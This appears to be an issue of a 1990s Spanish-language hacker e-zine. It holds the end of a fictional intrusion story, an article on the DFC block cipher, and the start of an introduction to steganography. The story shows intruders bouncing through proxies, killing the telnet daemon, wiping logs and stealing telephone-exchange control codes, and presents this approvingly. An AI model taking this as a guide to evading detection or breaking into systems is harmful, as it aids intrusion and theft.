root pts/2 02:39 0 2:09 1:21 -ksh
-Oh, demonios, demonios, el otro root esta aqui, que hacemos, que hacemos...
-dijo Batt-. Dame el telefono, quiero hablar con Layer. -Tenemos grandes
problemas, el otro root esta adentro, que hacemos hermano, dime que
brincaste en algun lugar antes de entrar a Zaibatsu.
-...solo en la W1ngat3 de Argentina, pense que tenias bajo control el
acceso, se bloqueo la conexion con Estados Unidos, no he terminado de
bajar el archivo que pidio Sysko, que hacemos?, tenemos que salir ahora,
son 10 MB los que faltan... -dijo Layer.
Batt manda un mensaje en linea al root. - Eres Cox50?.
-Si soy yo, quien eres tu?. -respondio el otro root.
-Fuck fuck, Layer no logro bajar la info que quieres Sysko, que hago con
el otro root, definitivamente NO es Cox3 -dijo Batt a Sysko.
-Entretenlo, mandale un mensaje, dile que alguien te paso esa cuenta pero
que no sabes que sucede que eres un usuario de Zaibatsu, pero NO PIERDAS
ESA CONEXION. -respondio Sysko.
-Fuck, esta matando procesos, voy a matar su shell, eso nos dara unos
segundos, pero necesito otro server a donde pasar tu info.
-Layer, sigues adentro? -pregunto Sysko.
-NO, perdi mi shell!.
-Demonios, voy a tener que matar el demonio de telnet, root esta adentro
de nuevo, pero si perdemos la conexion estamos fuera para siempre...
-agrego Batt.
-HAZLO...
-CRON activo el demonio de telnet de nuevo, voy a salir ahora...
# who
rortega pts/0 Apr 22 02:20 (w1ngat31.bounce.arg)
rortega pts/1 Apr 22 02:43 (ppp20-1.strayaxs.mx)
-maldita sea, alguien mas entro, pero no es root, alguien esta bailando
desde ppp20- 1.strayaxs.mx, QUIEN ES? -pregunto Batt
-...es ZYX -respondio Layer en la terminal.
- porque entro?, no tengo mas control sobre los LOGs, QUE SALGA AHORA
MISMO, y espero que no haya sido tan estupido como para entrar directo.
-No man, tenemos problemas, ZYX no triangulo en ninguna parte, tienes que
borrar esos LOGs! --
Layer, entra y busca alguna manera de limpiar el sistema, date prisa, voy a
matar el demonio de telnet, el shell de root lo he tirado 2 veces, date
prisa.
-Ok, estoy dentro, mata el demonio.
# who
rortega pts/0 Apr 22 02:20 (w1ngat31.bounce.arg)
rortega pts/1 Apr 22 02:45 (w1ngat31.bounce.arg)
root pts/2 Apr 23 02:45 (smeplce.smwhr.mx)
-Fuck, root alcanzo a entrar de nuevo, ya no encuentro el kill, no puedo
matar ya el proceso, date prisa Layer, borra los LOGs! -dijo Batt
-Tengo una copia de rm en /home... -dijo Layer-. NO!, estoy fuera, mato
mi proceso.
-Date prisa Batt, borra esos LOGs!!" -grito Sysko.
-No lo encuentro, no lo encuentro, va a matar mi shell! -respondio Batt
-Borra esos LOGs! -dijo Sysko alterado-. AHORA!.
Connection closed by foreign host.
-No hombre, creo que perdiste el shell!, borraste las bitacoras? -pregunto
Sysko
-Batt, dime que borraste las bitacoras! -dijo Layer por el celular.
"......" -...si... -dijo Batt.
- Terminaste de bajar la info?
-"......" -....no...., faltaron 250 MB de los dial-ups, pero los trunks
estan completos.
-lo logramos, cierra esta conexion, Layer se va a encargar de bajar los
filez, limpia esta cuenta, correla entre los lamahz...
-Borra logs en la w1ngat3 de Argentina y reinicializa... -dijo Batt
mientras cortaba la comunicacion con su ISP.
-OK, yo me encargo de los filez, y la w1ngat3, ya es publica...
-agrego Layer.
Sysko enciende otro cigarrillo y Batt voltea a ver su reloj digital, son
las 2:49am, extra¤a las manecillas... la info que obtuvieron fue lo que
esperaban, posicionamiento de satelites y algunos codigos de control de
las centrales telefonicas, parece que Zaibatsu va a tener un problema
proximamente, tal vez se entere o tal vez nunca se lleguen a enterar de su
existencia... Pero, ahi estaran...
Sysko toma su enorme Mot0rola y lo vuelve guardar en su bolsillo, pide a
Layer que en cuanto tenga la info bajada se lo haga saber, su tamag0tchi
pide comida, parece que Zaibatsu les recuerda que dependen de el a pesar
de todo...
Megaflop (sniffer@usa.net)
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
°°°°°°°°°°°°±±±±±±±±±±±±²²²²²²²²²²²²²°°°°°°°°°°°°°±±±±±±±±±±±±²²²²²²²²²²²²²
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ[RM #6]Í
A L G O R I T M O S D E C I F R A D O (2/2)
por Enrique A. Chaparro.
Continuando, una interesante propuesta del CNRS. Doy por hecho
que no es necesario repetir ciertas definiciones como "red de
Feistel", "whitening", etc. que ya fueron incluidas en el
mensaje relativo al algoritmo Twofish.
================================================================
Algoritmo: DFC --Decorrelated Fast Cipher--
---------
Autor(es): Henri Gilbert, Marc Girault (France Telecom); Philip
--------- Hoogvorst, Fabrice Noilhan, Thomas Pornin, Guillaume
Poupard, Jacques Stern y Serge Vaudenay (Ecole Normale
Superieure, Paris).
Elementos constructivos:
-----------------------
[NOTACION: a^b significa a elevado a la potencia b, y
mas generalmente un superindice b;
a$i$ significa a sub i;
s^- es la conversion de un string de bits s en un
entero;
|x|$l$ convierte un entero 'x' en un string de bits de
longitud l;
s|s' es la concatenacion de dos strings;
trunc$n$(s) trunca un string de bits a sus 'n' bits
mas a la izquierda;
XOR, AND y NO representan lo que dicen, en el sentido
de los bits.
Por ejemplo, (d43)^- = 3395 y |3395|$12$ = d43
Cadena y string son sinonimos. En general, el
producto de a por b se representa como a*b, aunque
a veces, si no hay confusion, es a x b]
AA - Definicion General y mecanica
..................................
DFC es una cifra con bloques de 128 bits que acepta
claves de longitud variable hasta 256 bits. La cifra
es una red de Feistel de 8 rondas con una funcion
'RF' que mapea cadenas de 64 bits en cadenas de 64
bits usando un parametro string de 128 bits. La clave
K se convierte en una "clave expandida" EK mediante
una funcion de expansion EF, una red de Feistel de
4 rondas; esto es
EK = EF(K)
Dado un bloque de texto claro de 128 bits PT, se lo
divide en dos mitades de 64 bits R0 y R1 tal que
PT = R0|R1. Dada la clave expandida EK, se la divide
en ocho cadenas de 128 bits,
EK = RK1|RK2|...|RK8
donde RKi es la i-esima clave de ronda.
Se construye la secuencia R0,...,R9 mediante la
ecuacion
R$i+1$ = RF$RK$i$$(R$i$) XOR R$i-1$
Dando CT = DFC$K$(PT) = R9|R8
De modo mas general, dado un string de bits de longitud
multiplo de 128, 128r, podemos dividirlo en 'r' strings
de 128 bits
s = p1|p2|...|pr
De s definimos una permutacion Enc$s$ del conjunto de
strings de 128 bits que proviene de un esquema de
Feistel de r rondas. Para cualquier cadena de 128 bits
'm' que se divide en dos mitades de 64 bits x0 y x1
tal que m = x0|x1 podemos construir una secuencia
x0,...,x$r+1$ mediante la ecuacion
x$i+1$ = RF$p$i$$(x$i$) XOR x$i-1$
y definimos Enc$s$(m) = x$r+1$|x$r$. En consecuencia
la funcion de cifrado DFC$K$ se obtiene como
DFC$K$ = Enc$EF(K)$
De alli una red de Feistel de 8 rondas. La funcion EF
usa una version de 4 rondas definida con Enc.
Obviamente, existe DFC$K$^(-1) = Enc$revEK$ donde
revEK = RK$8$|RK$7$|...|RK$1$
BB - La funcion RF
..................
La funcion se alimenta con un parametro de 128 bits,
o equivalentemente con dos de 64 bits, 'a' y 'b'.
Procesa un input 'x' de 64 bits y entrega un string
de 64 bits. Se define:
RF$a|b$(x) = CP (|(A mod (2^64 + 13)) mod 2^64|$64$)
donde
A = (a^- * x^- + b^-)
y donde CP es una permutacion sobre el conjunto de
todas las cadenas de 64 bits o "modulo de decorrelacion
de pares".
CC - La funcion CP
..................
La funcion usa una tabla de lookup RT que toma un
entero de 6 bits como input y provee como output
una cadena de 32 bits.
Sea y = yl|yr el input de CP donde yl y yr son dos
strings de 32 bits. Se define
CP(y) = |B^- + KD^- mod 2^64|$64$
donde
B = (yr XOR RT(trunc$6$(yl))^-)|(yl XOR KC)
donde KC es una cadena constante de 32 bits y KD es
una cadena constante de 64 bits. Las constantes KC,
KD, RT(0),...,RT(63) se definen mas abajo.
DD - Scheduling de la clave
...........................
Este algoritmo se usa para generar RK1,...,RK8 a
partir de una clave K de al menos 256 bits. Si la
clave tiene menos de 256 bits se hace padding a
derecha con una constante KS truncada al numero de
bits que falten para llegar a 256.
Luego se divide K en 8 strings de 32 bits PK1...PK8.
Se define:
OAP$1$ = PK1|PK8
OBP$1$ = PK5|PK4
EAP$1$ = PK2|PK7
EBP$1$ = PK3|PK6
Tambien:
OAP$i$ = OAP$1$ XOR KA$i$
OBP$i$ = OBP$1$ XOR KB$i$
EAP$i$ = EAP$1$ XOR KA$i$
EBP$i$ = EBP$1$ XOR KB$i$
para i = 2,3,4.
Definimos
EF$1$(K) = OAP$1$|OBP$1$|...|OAP$4$|OBP$4$
lo que define una permutacion de cuatro rondas que
es Enc$EF$1$(K)$. De modo similar,
EF$2$(K) = EAP$1$|EBP$1$|...|EAP$4$|EBP$4$
define una funcion de cifrado en cuatro rondas
Enc$EF$2$(K)$.
Enc$EF$1$(K)$ y Enc$EF$2$(K)$ permiten definir la
secuencia RK. Sea RK0 = |0|$128$ y
/Enc$EF$1$(K)$(RK$i-1) si i es impar
RKi -
\Enc$EF$2$(K)$(RK$i-1) si i es par
con lo que finalmente tenemos
EF(K) = RK1|RK2|...|RK8
EE - Las constantes
...................
El algoritmo depende de varias constantes:
- 64 constantes de 32 bits RT(|0|$6$),...,RT(|63|$6$)
- 1 constante de 64 bits KD
- 1 constante de 32 bits KC
- 3 constantes de 64 bits KA2, KA3, KA4
- 3 constantes de 64 bits KB2, KB3, KB4
- 1 constante de 256 bits KS.
Las constantes surgen de la expansion hexadecimal de
la constante matematica e (el numero de Euler, vio)
sum from n=0 to infinite 1/n!
2,b7e151628aed2a6abf7158809cf4f3c762e7160f38bd4da56a7
84d9045190cfef324e7738926cfbe5f4bf8d8d8c31d763da06c80
bb185eb4f7c7b5757f5958490cfd47d7c19bb42158d9554f7b46b
Sea EES la expansion de los primeros 2144 bits de e
despues de la coma decimal, entonces
EES = RT(0)|RT(1)|...|RT(63)|KC|KD
y
trunc$640$(EES) = KA2|KA3|KA4|KB2|KB3|KB4|KS
Performance: las cifras de performance se dan en ciclos de reloj,
----------- para el proceso de setup y cambio de claves ("key")
y para encriptar un bloque de 128bits ("enc").
Plataforma Lenguaje key enc
__________ ________ ___ ___
DEC Alpha 21164/600 ? ? 558
Pentium 200 ? ? 754
SPARC 167 ? ? 803
Criptoanalisis: De la teoria de la decorrelacion sabemos que una
-------------- red de Feistel de 6 rondas con RF con subclaves
independientes tiene una distancia de correlacion de
pares respecto de la Cifra Perfecta de 0,821*2^(-113).
Por lo tanto los limites inferiores de compeljidad para
criptonalisis para ataques que logren una ventaja de
al menos 10% seran
ataque limite inferior
de complejidad
****** ***************
criptoanalisis diferencial 2^110
criptonalisis lineal 2^92
ataques iterativos generales de
orden 1 2^48
Estos ataques se aplican a una funcion de encripcion
con 6 rondas asumiendo que EK tiene distribucion
uniforme.
El algoritmo es debil si se lo reduce a 4 rondas. Los
autores creen que la tecnica empleada genera suficiente
efecto de avalancha para que se provea adecuada seguridad
con 8 rondas.
De los datos anteriores resulta que una clave no debe
usarse mas de 2^48 veces, es decir que una misma clave
no debe ser usada para encriptar mas de 2^42 bytes.
Olfato: Veran que la explicacion de este algoritmo es *mucho*
------ mas breve que la anterior para Twofish; esto en parte
se debe a que alli introduje algunos conceptos que se
dan por sabidos en esta segunda nota. Pero mas que
nada se debe a que este es mucho mas "elegante" desde
el punto de vista matematico, esta probadamente libre
de posibilidades de trapdoors, y se apoya en avances
teoricos recientes (las tecnicas de decorrelacion).
De alli, me parece, que tiene las virtudes de lo
simple.
Por los costados negativos, es un 30% mas lento que
MARS o Twofish, aunque habra que ver que se logra
optimizando el codigo. Por otro, el factor de resis-
tencia a ataques iterativos no parece ser hoy un
impedimento practico, pero puede serlo en un futuro
(quien sabe que tecnicas de criptoanalisis tendremos
en 2010).
---------------------------------------------------------------
Este material se basa en la publicacion "Decorrelated Fast
Cipher: an AES Candidate", Extended Abstract, version del
12 de julio de 1998.
---------------------------------------------------------------
Los derechos de Copyright (c) de este material permanecen en
el autor, quien concede por este medio amplio derecho de copia
y redistribucion, en tanto:
(a) la reproduccion, copia o redistribucion se hagan solo a
titulo gratuito.
(b) se haga mencion a los derechos de autor.
Copyright (c) 1998 Enrique A. Chaparro
===============================================================
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
°°°°°°°°°°°°±±±±±±±±±±±±²²²²²²²²²²²²²°°°°°°°°°°°°°±±±±±±±±±±±±²²²²²²²²²²²²²
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ[RM #6]Í
ESTEGANOGRAFIA - Una introduccion
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
xDAWN (Xdawn@BigFoot.com)
" Puedes estar planificando una campa¤a politica, tratando sobre
tus impuestos o teniendo una aventura. O puedes estar haciendo
algo que en tu opinion no deberia ser ilegal, pero que lo es.
Sea lo que fuere,no quieres que nadie mas lea tu email privado
ni tus documentos confidenciales. No hay nada malo en afirmar
tu derecho a la intimidad."
Phil Zimmerman
Pretty Good Privacy
Esteganografia o steganography es una tecnica que tiene la misma finalidad
que la criptografia, en el cual unicamente el interlocutor autorizado tiene
acceso a la comunicacion, aunque esto lo logra por medios diferentes, por
ejemplo, cuando mandas un mensaje encriptado con PGP todo aquel que logre
interceptar o ver este mensaje (p/e administradores, chismosos, etc) sabra
que estas encriptando tus comunicaciones y pueden sospechar de tus malas
intenciones =), mas sin embargo, si usas tecnicas esteganograficas puedes
comunicarte de manera segura y pasando desapersivido ante cualquier persona
lograndolo mandando mensajes ocultos (o archivos) en otros mensajes.
Uno de los primeros documentos encontrados utilizando estas tecnicas para
ocultar datos fue en la antiga Grecia, cuenta la historia que Demeratus
notifico a Sparta que Xerxes intentaba invadir Grecia,esto lo hizo mandando
un mensaje escribiendo en unas tablas de madera que posteriormente cubrio
con cera, asi parecian que estaban en blanco y pasaron desapersividas por
los inspectores sin interrogarle [http://www.fravia.org/stego.htm] tambien
en tiempos de guerra se ha usado estas tecnicas, por ejemplo al escribir en
papel con algun tipo de tinta especial en la que solo es visible bajo
determinadas circunstancias; pero ahora transmitiendo informacion por otros
tipos de medios esta tecnica se implementa mas y de manera mas segura pues
las comunicaciones ahora son electronicas XD
En la red puedes encontrar muy buenos programas que te permiten hacer uso
de la esteganografia, como p/e S-Tools, Hide and Seek, Gif Extract, etc.
Aqui muestro el uso de 2 de los mejores programas y ya puedes obtenerlos de
la web de Raza Mexicana Team.
